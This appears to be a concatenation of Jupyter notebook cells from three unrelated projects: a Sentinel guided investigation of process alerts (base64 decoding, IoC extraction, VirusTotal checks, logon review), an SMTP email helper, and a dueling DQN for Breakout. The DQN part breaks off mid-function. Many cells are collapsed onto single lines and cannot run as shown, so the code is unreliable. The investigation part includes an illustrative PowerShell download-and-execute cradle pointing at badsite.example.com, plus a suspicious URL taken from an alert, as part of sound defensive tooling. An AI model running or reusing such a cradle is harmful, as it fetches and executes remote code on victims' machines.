The top graph shows that, for a given process, some have wide variability in their command line content while the majority have little or none. Looking at a couple of examples - like cmd.exe, powershell.exe, reg.exe, net.exe - we can recognize several common command line tools.The second graph shows processes by full process path content. We wouldn't normally expect to see variation here - as is the case with most. There is also quite a lot of variance in the score, making it a useful proxy feature for a unique path name (this means that proc1.exe and proc2.exe that happen to have the same commandline score won't get collapsed into the same cluster).Any process with a spread of values here means that the same process name (but not necessarily the same file) is being run from different locations.
if not clus_events.empty:
    resp = input('View the clustered data? y/n')
    if resp == 'y':
        display(clus_events.sort_values('TimeGenerated')[['TimeGenerated', 'LastEventTime',
                                                          'NewProcessName', 'CommandLine',
                                                          'ClusterSize', 'commandlineTokensFull',
                                                          'pathScore', 'isSystemSession']])

    # Look at clusters for individual process names
    def view_cluster(exe_name):
        display(clus_events[['ClusterSize', 'processName', 'CommandLine', 'ClusterId']]
                [clus_events['processName'] == exe_name])

    display(Markdown('You can view the cluster members for individual processes '
                     'by inserting a new cell and entering:<br>'
                     '`>>> view_cluster(process_name)`<br>'
                     'where process_name is the unqualified process binary, e.g.<br>'
                     '`>>> view_cluster(\'reg.exe\')`'))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Timeline showing clustered vs. original data
# Show timeline of events - clustered events if not clus_events.empty: nbdisp.display_timeline(data=clus_events, overlay_data=processes_on_host, alert=security_alert, title='Distinct Host Processes (top) and All Proceses (bottom)')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Base64 Decode and Check for IoCsThis section looks for Indicators of Compromise (IoCs) within the data sets passed to it. The first section looks at the commandline for the alert process (if any). It also looks for base64 encoded strings within the data - this is a common way of hiding attacker intent. It attempts to decode any strings that look like base64. Additionally, if the base64 decode operation returns any items that look like a base64 encoded string or file, a gzipped binary sequence, or a zipped or tar archive, it will attempt to extract the contents before searching for potentially interesting items.
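As a stand-alone illustration of the same mechanics, the sketch below encodes a synthetic command line and runs it through the decode and IoC extraction steps. The encoded command is made up for this example; if nothing is decoded, unpack_items simply returns its input unchanged (as noted in the cell that follows).
```
import base64

# Synthetic example - encode a string, then let unpack_items find and decode it
fake_cmd = ('powershell -enc ' +
            base64.b64encode(b'IEX (New-Object Net.WebClient)'
                             b'.DownloadString("http://badsite.example.com/payload")').decode())
decoded, _ = sectools.b64.unpack_items(input_string=fake_cmd)
print(decoded)
print(sectools.IoCExtract().extract(decoded))
```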
process = security_alert.primary_process ioc_extractor = sectools.IoCExtract() if process: # if nothing is decoded this just returns the input string unchanged base64_dec_str, _ = sectools.b64.unpack_items(input_string=process["CommandLine"]) if base64_dec_str and '<decoded' in base64_dec_str: print('Base64 encoded items found.') print(base64_dec_str) # any IoCs in the string? iocs_found = ioc_extractor.extract(base64_dec_str) if iocs_found: print('\nPotential IoCs found in alert process:') display(iocs_found) else: print('Nothing to process')
Potential IoCs found in alert process:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
If we have a process tree, look for IoCs in the whole data setYou can replace the data=process_tree parameter in the call to ioc_extractor.extract() to pass other data frames. Use the columns parameter to specify which column or columns you want to search.
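For example, to scan a different dataframe you could pass the processes_on_host frame built earlier in this notebook; the column choice here is illustrative only.
```
# Illustrative only - scan a different dataframe and different columns
other_iocs = ioc_extractor.extract(data=processes_on_host,
                                   columns=['NewProcessName', 'CommandLine'])
if len(other_iocs):
    display(other_iocs)
```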
ioc_extractor = sectools.IoCExtract()

try:
    # process_tree may be None if the alert had no process entity
    if process_tree is not None and not process_tree.empty:
        source_processes = process_tree
    else:
        source_processes = clus_events
except NameError:
    source_processes = None

if source_processes is not None:
    ioc_df = ioc_extractor.extract(data=source_processes,
                                   columns=['CommandLine'],
                                   os_family=security_alert.os_family,
                                   ioc_types=['ipv4', 'ipv6', 'dns', 'url',
                                              'md5_hash', 'sha1_hash', 'sha256_hash'])
    if len(ioc_df):
        display(HTML("<h3>IoC patterns found in process tree.</h3>"))
        display(ioc_df)
else:
    ioc_df = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
If there are any Base64 encoded strings, decode them and search for IoCs in the results.For simple strings the Base64 decoded output is straightforward. However for nested encodings this can get a little complex and difficult to represent in a tabular format.**Columns** - reference - The index of the row item in dotted notation, in depth.seq pairs (e.g. 1.2.2.3 would be the 3rd item at depth 3 that is a child of the 2nd item found at depth 1). This may not always be an accurate notation - it is mainly used to allow you to associate an individual row with the reference value contained in the full_decoded_string column of the topmost item. - original_string - the original string before decoding. - file_name - filename, if any (only if this is an item in a zip or tar file). - file_type - a guess at the file type (this is currently elementary and only includes a few file types). - input_bytes - the decoded bytes as a Python bytes string. - decoded_string - the decoded string if it can be decoded as a UTF-8 or UTF-16 string. Note: binary sequences may often successfully decode as UTF-16 strings but, in these cases, the decodings are meaningless. - encoding_type - encoding type (UTF-8 or UTF-16) if a decoding was possible, otherwise 'binary'. - file_hashes - collection of file hashes for any decoded item. - md5 - md5 hash as a separate column. - sha1 - sha1 hash as a separate column. - sha256 - sha256 hash as a separate column. - printable_bytes - printable version of input_bytes as a string of \xNN values - src_index - the index of the row in the input dataframe from which the data came. - full_decoded_string - the full decoded string with any decoded replacements. This is only really useful for top-level items, since nested items will only show the 'full' string representing the child fragment.
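After the next cell has produced dec_df, a quick way to pull out just the items that yielded a file hash is sketched below. It is purely illustrative and relies on the column names described above.
```
# Illustrative only - run after dec_df has been created below
if 'dec_df' in globals() and not dec_df.empty and 'sha256' in dec_df.columns:
    display(dec_df.loc[dec_df['sha256'].notna(),
                       ['reference', 'decoded_string', 'sha256']])
```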
if source_processes is not None: dec_df = sectools.b64.unpack_items(data=source_processes, column='CommandLine') if source_processes is not None and not dec_df.empty: display(HTML("<h3>Decoded base 64 command lines</h3>")) display(HTML("Warning - some binary patterns may be decodable as unicode strings")) display(dec_df[['full_decoded_string', 'original_string', 'decoded_string', 'input_bytes', 'file_hashes']]) ioc_dec_df = ioc_extractor.extract(data=dec_df, columns=['full_decoded_string']) if len(ioc_dec_df): display(HTML("<h3>IoC patterns found in base 64 decoded data</h3>")) display(ioc_dec_df) if ioc_df is not None: ioc_df = ioc_df.append(ioc_dec_df ,ignore_index=True) else: ioc_df = ioc_dec_df else: print("No base64 encodings found.") ioc_df = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Virus Total LookupThis section uses the popular Virus Total service to check any recovered IoCs against VT's database.To use this you need an API key from Virus Total, which you can obtain here: https://www.virustotal.com/.Note that VT throttles requests for free API keys to 4/minute. If you are unable to process the entire data set, try splitting it and submitting smaller chunks.**Things to note:**- Virus Total lookups include file hashes, domains, IP addresses and URLs.- The returned data is slightly different depending on the input type- The VTLookup class tries to screen input data to prevent pointless lookups. E.g.: - Only public IP addresses will be submitted (no loopback, private address space, etc.) - URLs with only local (unqualified) host parts will not be submitted. - Domain names that are unqualified will not be submitted. - Hash-like strings (e.g. 'AAAAAAAAAAAAAAAAAA') that do not appear to have enough entropy to be a hash will not be submitted.**Output Columns** - Observable - The IoC observable submitted - IoCType - the IoC type - Status - the status of the submission request - ResponseCode - the VT response code - RawResponse - the entire raw json response - Resource - VT Resource - SourceIndex - The index of the Observable in the source DataFrame. You can use this to rejoin to your original data. - VerboseMsg - VT Verbose Message - ScanId - VT Scan ID if any - Permalink - VT Permanent URL describing the resource - Positives - If this is not zero, it indicates the number of malicious reports that VT holds for this observable. - MD5 - The MD5 hash, if any - SHA1 - The SHA1 hash, if any - SHA256 - The SHA256 hash, if any - ResolvedDomains - In the case of IP addresses, this contains a list of all domains that resolve to this IP address - ResolvedIPs - In the case of domains, this contains a list of all IP addresses resolved from the domain. - DetectedUrls - Any malicious URLs associated with the observable.
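If you hit the free-tier rate limit, one way to split the submissions is sketched below. This is illustrative only; it assumes vt_lookup and ioc_df exist as created in the next cell and simply pauses a minute between chunks of four observables.
```
import time
import pandas as pd

# Illustrative only - submit IoCs in chunks of 4 to respect the 4/minute quota
chunk_results = []
for start in range(0, len(ioc_df), 4):
    chunk = ioc_df.iloc[start:start + 4]
    chunk_results.append(vt_lookup.lookup_iocs(data=chunk,
                                               type_col='IoCType',
                                               src_col='Observable'))
    time.sleep(60)
vt_results_chunked = pd.concat(chunk_results, ignore_index=True)
```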
vt_key = mas.GetEnvironmentKey(env_var='VT_API_KEY', help_str='To obtain an API key sign up here https://www.virustotal.com/', prompt='Virus Total API key:') vt_key.display() if vt_key.value and ioc_df is not None and not ioc_df.empty: vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2) print(f'{len(ioc_df)} items in input frame') supported_counts = {} for ioc_type in vt_lookup.supported_ioc_types: supported_counts[ioc_type] = len(ioc_df[ioc_df['IoCType'] == ioc_type]) print('Items in each category to be submitted to VirusTotal') print('(Note: items have pre-filtering to remove obvious erroneous ' 'data and false positives, such as private IPaddresses)') print(supported_counts) print('-' * 80) vt_results = vt_lookup.lookup_iocs(data=ioc_df, type_col='IoCType', src_col='Observable') pos_vt_results = vt_results.query('Positives > 0') if len(pos_vt_results) > 0: display(HTML(f'<h3>{len(pos_vt_results)} Positive Results Found</h3>')) display(pos_vt_results[['Observable', 'IoCType','Permalink', 'ResolvedDomains', 'ResolvedIPs', 'DetectedUrls', 'RawResponse']]) display(HTML('<h3>Other results</h3>')) display(vt_results.query('Status == "Success"'))
5 items in input frame Items in each category to be submitted to VirusTotal (Note: items have pre-filtering to remove obvious erroneous data and false positives, such as private IPaddresses) {'ipv4': 0, 'dns': 2, 'url': 2, 'md5_hash': 0, 'sha1_hash': 0, 'sh256_hash': 0} -------------------------------------------------------------------------------- Invalid observable format: "wh401k.org", type "dns", status: Observable does not match expected pattern for dns - skipping. (Source index 4) Invalid observable format: "wh401k.org", type "dns", status: Observable does not match expected pattern for dns - skipping. (Source index 0) Submitting observables: "http://wh401k.org/getps"", type "url" to VT. (Source index 4) Error in response submitting observables: "http://wh401k.org/getps"", type "url" http status is 403. Response: None (Source index 4) Submitting observables: "http://wh401k.org/getps"</decoded>", type "url" to VT. (Source index 0) Error in response submitting observables: "http://wh401k.org/getps"</decoded>", type "url" http status is 403. Response: None (Source index 0) Submission complete. 4 responses from 5 input rows
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
To view the raw response for a specific row:
```
import json
row_idx = 0  # The row number from one of the above dataframes
raw_response = json.loads(pos_vt_results['RawResponse'].loc[row_idx])
raw_response
```
[Contents](toc) Alert command line - Occurrence on other hosts in workspaceTo get a sense of whether the alert process is something that is occurring on other hosts, run this section. This might tell you that the alerted process is actually a commonly-run process and the alert is a false positive. Alternatively, it may tell you that a real infection or attack is happening on other hosts in your environment.
# set the origin time to the time of our alert query_times = mas.QueryTime(units='day', before=5, max_before=20, after=1, max_after=10, origin_time=security_alert.origin_time) query_times.display() # API ILLUSTRATION - Find the query to use qry.list_queries() # API ILLUSTRATION - What does the query look like? qry.query_help('list_hosts_matching_commandline') # This query needs a commandline parameter which isn't supplied # by default from the the alert # - so extract and escape this from the process if not security_alert.primary_process: raise ValueError('This alert has no process entity. This section is not applicable.') proc_match_in_ws = None commandline = security_alert.primary_process.CommandLine commandline = mas.utility.escape_windows_path(commandline) if commandline.strip(): proc_match_in_ws = qry.list_hosts_matching_commandline(provs=[query_times, security_alert], commandline=commandline) else: print('process has empty commandline') # Check the results if proc_match_in_ws is None or proc_match_in_ws.empty: print('No proceses with matching commandline found in on other hosts in workspace') print('between', query_times.start, 'and', query_times.end) else: hosts = proc_match_in_ws['Computer'].drop_duplicates().shape[0] processes = proc_match_in_ws.shape[0] print('{numprocesses} proceses with matching commandline found on {numhosts} hosts in workspace'\ .format(numprocesses=processes, numhosts=hosts)) print('between', query_times.start, 'and', query_times.end) print('To examine these execute the dataframe \'{}\' in a new cell'.format('proc_match_in_ws')) print(proc_match_in_ws[['TimeCreatedUtc','Computer', 'NewProcessName', 'CommandLine']].head())
No proceses with matching commandline found in on other hosts in workspace between 2019-02-08 22:04:16 and 2019-02-14 22:04:16
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Host LogonsThis section retrieves the logon events on the host in the alert. You may want to use the query times widget below to search over a broader time range than the default.
# set the origin time to the time of our alert query_times = mas.QueryTime(units='day', origin_time=security_alert.origin_time, before=1, after=0, max_before=20, max_after=1) query_times.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Alert Logon AccountThe logon associated with the process in the alert.
logon_id = security_alert.get_logon_id() if logon_id: if logon_id in ['0x3e7', '0X3E7', '-1', -1]: print('Cannot retrieve single logon event for system logon id ' '- please continue with All Host Logons below.') else: logon_event = qry.get_host_logon(provs=[query_times, security_alert]) nbdisp.display_logon_data(logon_event, security_alert) else: print('No account entity in the source alert or the primary account had no logonId value set.')
### Account Logon Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-02-13 22:03:42.283000 Logon type: 4 (Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Session id '0x1e821b5' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
All Host LogonsSince the number of logon events may be large and, in the case of system logons, very repetitive, we use clustering to try to identify logons with unique characteristics.In this case we use the numeric score of the account name and the logon type (i.e. interactive, service, etc.). The results of the clustered logons are shown below along with a more detailed, readable printout of the logon event information. The data here will vary depending on whether this is a Windows or Linux host.
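To get a feel for the account-name feature, the short sketch below scores a few names by hand. It is illustrative only; _string_score is the same helper imported in the next cell, and the sample account names are taken from the outputs shown earlier in this notebook.
```
from msticpy.sectools.eventcluster import _string_score

# Illustrative only - score a few account names seen in the alert outputs
for acct in ['MSTICAlertsWin1\\MSTICAdmin', 'NT AUTHORITY\\SYSTEM', 'Window Manager\\DWM-2']:
    print(acct, _string_score(acct))
```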
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features, _string_score host_logons = qry.list_host_logons(provs=[query_times, security_alert]) if host_logons is not None and not host_logons.empty: logon_features = host_logons.copy() logon_features['AccountNum'] = host_logons.apply(lambda x: _string_score(x.Account), axis=1) logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1) # you might need to play around with the max_cluster_distance parameter. # decreasing this gives more clusters. (clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated', cluster_columns=['AccountNum', 'LogonType'], max_cluster_distance=0.0001) print('Number of input events:', len(host_logons)) print('Number of clustered events:', len(clus_logons)) print('\nDistinct host logon patterns:') display(clus_logons.sort_values('TimeGenerated')) else: print('No logon events found for host.') # Display logon details nbdisp.display_logon_data(clus_logons, security_alert)
### Account Logon Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-02-13 22:03:42.283000 Logon type: 4 (Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Session id '0x1e821b5' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: ### Account Logon Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-02-13 21:10:58.540000 Logon type: 5 (Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Session id '0x3e7' System logon session Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: ### Account Logon Account: DWM-2 Account Domain: Window Manager Logon Time: 2019-02-12 22:22:21.240000 Logon type: 2 (Interactive) User Id/SID: S-1-5-90-0-2 Session id '0x106b458' Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Comparing All Logons with Clustered Results Relative to the Alert Timeline
# Show timeline of events - all logons + clustered logons if host_logons is not None and not host_logons.empty: nbdisp.display_timeline(data=host_logons, overlay_data=clus_logons, alert=security_alert, source_columns=['Account', 'LogonType'], title='All Host Logons')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
View Process Session and Logon Events in TimelinesThis shows the timeline of the clustered logon events with the process tree obtained earlier. This allows you to get a sense of which logon was responsible for the process tree session and whether any additional logons (e.g. creating a process as another user) might be associated with the alert timeline.*Note: you should use the pan and zoom tools to align the timelines since the data may be over different time ranges.*
# Show timeline of events - all events if host_logons is not None and not host_logons.empty: nbdisp.display_timeline(data=clus_logons, source_columns=['Account', 'LogonType'], alert=security_alert, title='Clustered Host Logons', height=200) try: nbdisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session', height=200) except NameError: print('process_tree not available for this alert.') # Counts of Logon types by Account if host_logons is not None and not host_logons.empty: display(host_logons[['Account', 'LogonType', 'TimeGenerated']] .groupby(['Account','LogonType']).count() .rename(columns={'TimeGenerated': 'LogonCount'}))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Failed Logons
failedLogons = qry.list_host_logon_failures(provs=[query_times, security_alert])
if failedLogons.shape[0] == 0:
    print(f'No logon failures recorded for this host between '
          f'{query_times.start} and {query_times.end}')
failedLogons
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Appendices Available DataFrames
print('List of current DataFrames in Notebook') print('-' * 50) current_vars = list(locals().keys()) for var_name in current_vars: if isinstance(locals()[var_name], pd.DataFrame) and not var_name.startswith('_'): print(var_name)
List of current DataFrames in Notebook -------------------------------------------------- mydf alert_counts alert_list related_alerts process_tree processes_on_host feature_procs clus_events source_processes ioc_df dec_df ioc_dec_df vt_results pos_vt_results proc_match_in_ws logon_event host_logons logon_features clus_logons failedLogons
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Compose and send emails> Compose and send html emails through an SMTP server using TLS.
#hide from nbdev.showdoc import * #export import smtplib from email.message import EmailMessage import mimetypes from pathlib2 import Path import re
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Compose a message
#export def create_html_message(from_address, to_addresses, subject, html, text = None, image_path = Path.cwd()): msg = EmailMessage() msg['From'] = from_address msg['To'] = to_addresses msg['Subject'] = subject if text is not None: msg.set_content(text) msg.add_alternative(html, subtype='html') cid_images = list(re.findall(fr'<img src="cid:(.*?)"', html)) cid_images.extend(list(re.findall(fr'url\(cid:(.*?)\)', html))) cid_images = list(set(cid_images)) for cid_img in cid_images: with open(image_path / cid_img, 'rb') as img: msg.get_payload()[-1].add_related(img.read(),'image', 'jpeg', cid = cid_img) return msg
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Add an attachment to a message
#export
def add_attachmet(msg, path):
    "Add an attachment located at `path` to the current message `msg`."
    # Guess the content type based on the file's extension.  Encoding
    # will be ignored, although we should check for simple things like
    # gzip'd or compressed files.
    ctype, encoding = mimetypes.guess_type(path)
    if ctype is None or encoding is not None:
        # No guess could be made, or the file is encoded (compressed), so
        # use a generic bag-of-bits type.
        ctype = 'application/octet-stream'
    maintype, subtype = ctype.split('/', 1)
    with open(path, 'rb') as f:
        msg.add_attachment(f.read(),
                           maintype = maintype,
                           subtype = subtype,
                           filename = path.name)
    return msg
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Send a message using SMTP and TLS
#export
def send_smtp_email(server, tls_port, user, pw, msg):
    "Send the message `msg` using the specified `server` and `tls_port` - login using `user` and `pw`."
    smtp = None
    try:
        # connect to the server and upgrade the connection to TLS
        smtp = smtplib.SMTP(server, tls_port)
        smtp.starttls()
        smtp.login(user, pw)
        smtp.send_message(msg)
    except Exception as e:
        print(e)
    finally:
        if smtp is not None:
            smtp.quit()
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
Examples The following is an example of how to compose and send an HTML email message.
## set user and password of the smtp server #user = '' #pw = '' # ## send email from and to myself #from_email = user #to_email = '' # #html = """ #Hello, this is a test message! #<h1>Hello 22!</h1> #<img src="cid:email.jpg"> #<h1>Hello 23!</h1> #<img src="cid:iceberg.jpg"> #""" # #msg = create_html_message(from_email, to_email, 'subject', html, image_path=Path('')) #add_attachmet(msg, Path('')) # ## uncomment after setting user and pw above ##send_smtp_email('', 587, user, pw, msg)
_____no_output_____
Apache-2.0
03_email.ipynb
eandreas/secretsanta
DQN With Prioritized Replay BufferUse a prioritized replay buffer to train a DQN agent.
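For reference, the sketch below shows the standard prioritized-replay arithmetic the buffer relies on (Schaul et al.): sampling probabilities proportional to priority^alpha and importance sampling weights (N * P(i))^(-beta). The PrioritizedReplayBuffer implementation imported later may differ in detail.
```
import numpy as np

# Sampling probabilities and importance-sampling weights for a toy priority set
priorities = np.array([2.0, 0.5, 1.0, 0.1])   # |TD error| of stored samples
alpha, beta = 0.6, 0.4                        # prioritization / IS exponents

probs = priorities ** alpha
probs /= probs.sum()                          # P(i) proportional to p_i^alpha

weights = (len(priorities) * probs) ** (-beta)
weights /= weights.max()                      # normalize so the largest weight is 1
print(probs)
print(weights)
```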
import random
import numpy as np

import torch
import torch.nn as nn
import torch.nn.functional as F

import utils

import gym
from gym.core import ObservationWrapper
from gym.spaces import Box

import cv2
import os

import atari_wrappers                 # wrappers that adjust the Atari env
from framebuffer import FrameBuffer   # stacks 4 consecutive frames

ENV_NAME = "BreakoutNoFrameskip-v4"

# create the Breakout env
env = gym.make(ENV_NAME)
env.reset()
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
PreprocessingCrop the important part of the image, resize it to 64 x 64, convert it to grayscale and scale pixel values to [0, 1].
class PreprocessAtariObs(ObservationWrapper): def __init__(self, env): """A gym wrapper that crops, scales image into the desired shapes and grayscales it.""" ObservationWrapper.__init__(self, env) self.image_size = (1, 64, 64) self.observation_space = Box(0.0, 1.0, self.image_size) def observation(self, img): """what happens to each observation""" # Here's what you need to do: # * crop image, remove irrelevant parts # * resize image to self.img_size # (use imresize from any library you want, # e.g. opencv, skimage, PIL, keras) # * cast image to grayscale # * convert image pixels to (0,1) range, float32 type # crop the image # remove the top part img = img[50:] # resize the image img = cv2.resize(img, dsize=(self.image_size[1], self.image_size[2])) # gray scale img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) # normalize to (0, 1) img = img.astype(np.float32) / 255.0 # add channel dimension return img[None] # adjust the env by some wrappers def PrimaryAtariWrap(env, clip_rewards=True): assert 'NoFrameskip' in env.spec.id # This wrapper holds the same action for <skip> frames and outputs # the maximal pixel value of 2 last frames (to handle blinking # in some envs) env = atari_wrappers.MaxAndSkipEnv(env, skip=4) # This wrapper sends done=True when each life is lost # (not all the 5 lives that are givern by the game rules). # It should make easier for the agent to understand that losing is bad. env = atari_wrappers.EpisodicLifeEnv(env) # This wrapper laucnhes the ball when an episode starts. # Without it the agent has to learn this action, too. # Actually it can but learning would take longer. env = atari_wrappers.FireResetEnv(env) # This wrapper transforms rewards to {-1, 0, 1} according to their sign if clip_rewards: env = atari_wrappers.ClipRewardEnv(env) # This wrapper is yours :) env = PreprocessAtariObs(env) return env def make_env(clip_rewards=True, seed=None): env = gym.make(ENV_NAME) # create raw env if seed is not None: env.seed(seed) env = PrimaryAtariWrap(env, clip_rewards) env = FrameBuffer(env, n_frames=4, dim_order='pytorch') return env env = make_env() env.reset() n_actions = env.action_space.n state_shape = env.observation_space.shape print("adjusted env with 4 consec images stacked can be created")
adjusted env with 4 consec images stacked can be created
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
ModelA dueling DQN agent: a convolutional feature extractor feeds two heads, an advantage head A(s, a) and a state-value head V(s), combined as Q(s, a) = V(s) + A(s, a) - mean_a A(s, a).
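As a quick sanity check on the layer sizes used below, the arithmetic here mirrors conv2d_size_out with kernel_size=3 and stride=2 applied three times to a 64x64 input.
```
# Worked example: spatial size after the three conv layers below
size = 64
for _ in range(3):
    size = (size - (3 - 1) - 1) // 2 + 1
print(size)                 # -> 7
print(64 * size * size)     # -> 3136, the input size of the first linear layer
```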
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') def conv2d_size_out(size, kernel_size, stride): """ common use case: cur_layer_img_w = conv2d_size_out(cur_layer_img_w, kernel_size, stride) cur_layer_img_h = conv2d_size_out(cur_layer_img_h, kernel_size, stride) to understand the shape for dense layer's input """ return (size - (kernel_size - 1) - 1) // stride + 1 class DuelingDQNAgent(nn.Module): def __init__(self, state_shape, n_actions, epsilon=0): super().__init__() self.epsilon = epsilon self.n_actions = n_actions self.state_shape = state_shape # Define your network body here. Please make sure agent is fully contained here # nn.Flatten() can be useful kernel_size = 3 stride = 2 self.conv1 = nn.Conv2d(4, 16, kernel_size, stride) out_size = conv2d_size_out(state_shape[1], kernel_size, stride) self.conv2 = nn.Conv2d(16, 32, kernel_size, stride) out_size = conv2d_size_out(out_size, kernel_size, stride) self.conv3 = nn.Conv2d(32, 64, kernel_size, stride) out_size = conv2d_size_out(out_size, kernel_size, stride) # size of the output tensor after convolution batch_size x 64 x out_size x out_size self.linear = nn.Linear(64*out_size*out_size, 256) # advantage self.advantage = nn.Sequential( nn.Linear(256, 512), nn.ReLU(), nn.Linear(512, self.n_actions) ) # state value self.value = nn.Sequential( nn.Linear(256, 512), nn.ReLU(), nn.Linear(512, 1) ) def forward(self, state_t): """ takes agent's observation (tensor), returns qvalues (tensor) :param state_t: a batch of 4-frame buffers, shape = [batch_size, 4, h, w] """ # Use your network to compute qvalues for given state # qvalues = <YOUR CODE> t = self.conv1(state_t) t = F.relu(t) t = self.conv2(t) t = F.relu(t) t = self.conv3(t) t = F.relu(t) t = t.view(state_t.shape[0], -1) t = self.linear(t) t = F.relu(t) # compute advantage and state value as different heads advantage = self.advantage(t) value = self.value(t) qvalues = value + advantage - advantage.mean(dim=1, keepdim=True) assert qvalues.requires_grad, "qvalues must be a torch tensor with grad" assert len( qvalues.shape) == 2 and qvalues.shape[0] == state_t.shape[0] and qvalues.shape[1] == n_actions return qvalues def get_qvalues(self, states): """ like forward, but works on numpy arrays, not tensors """ model_device = next(self.parameters()).device states = torch.tensor(states, device=model_device, dtype=torch.float) qvalues = self.forward(states) return qvalues.data.cpu().numpy() def sample_actions(self, qvalues): """pick actions given qvalues. Uses epsilon-greedy exploration strategy. """ epsilon = self.epsilon batch_size, n_actions = qvalues.shape random_actions = np.random.choice(n_actions, size=batch_size) best_actions = qvalues.argmax(axis=-1) should_explore = np.random.choice( [0, 1], batch_size, p=[1-epsilon, epsilon]) return np.where(should_explore, random_actions, best_actions) # Evaluate the agent def evaluate(env, agent, n_games=1, greedy=False, t_max=10000): rewards = [] for _ in range(n_games): reward = 0.0 s = env.reset() for _ in range(t_max): qvalues = agent.get_qvalues([s]) action = qvalues.argmax(axis=-1)[0] if greedy else agent.sample_actions( qvalues)[0] s, r, done, _ = env.step(action) reward += r if done: break rewards.append(reward) return np.mean(rewards)
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
Compute TD lossThe (double DQN) target is $\hat Q(s_t, a_t) = r_t + \gamma \cdot Target(s_{t+1}, \arg\max_{a} Q(s_{t+1}, a))$. The function below returns the per-sample TD error $\hat Q(s_t, a_t) - Q(s_t, a_t)$, which the training loop squares and weights with the importance sampling weights from the prioritized buffer.
def compute_td_loss(states, actions, rewards, next_states, is_done,
                    agent, target_network,
                    gamma=0.99,
                    device=device, check_shapes=False):
    """Compute the per-sample TD error using torch operations only.

    The (double DQN) objective for the agent is
        Q_hat(s_t, a_t) = r_t + gamma * Target(s_{t+1}, argmax_a Q(s_{t+1}, a))
    and this function returns the TD error
        Q_hat(s_t, a_t) - Q(s_t, a_t)
    for every sample in the batch.
    """
    states = torch.tensor(states, device=device, dtype=torch.float)        # shape: [batch_size, *state_shape]
    actions = torch.tensor(actions, device=device, dtype=torch.long)       # shape: [batch_size]
    rewards = torch.tensor(rewards, device=device, dtype=torch.float)      # shape: [batch_size]
    next_states = torch.tensor(next_states, device=device, dtype=torch.float)  # shape: [batch_size, *state_shape]
    is_done = torch.tensor(is_done, device=device, dtype=torch.float)      # shape: [batch_size]
    is_not_done = 1 - is_done

    # q-values for all actions in the current states (online network)
    predicted_qvalues = agent(states)

    # q-values for all actions in the next states (target network)
    predicted_next_qvalues = target_network(next_states)

    # double DQN: pick the best next action with the online network ...
    next_best_actions = torch.argmax(agent(next_states), dim=1)

    # ... and evaluate that action with the target network
    next_state_values = predicted_next_qvalues[range(len(actions)), next_best_actions]

    # q-values of the actions that were actually taken
    predicted_qvalues_for_actions = predicted_qvalues[range(len(actions)), actions]

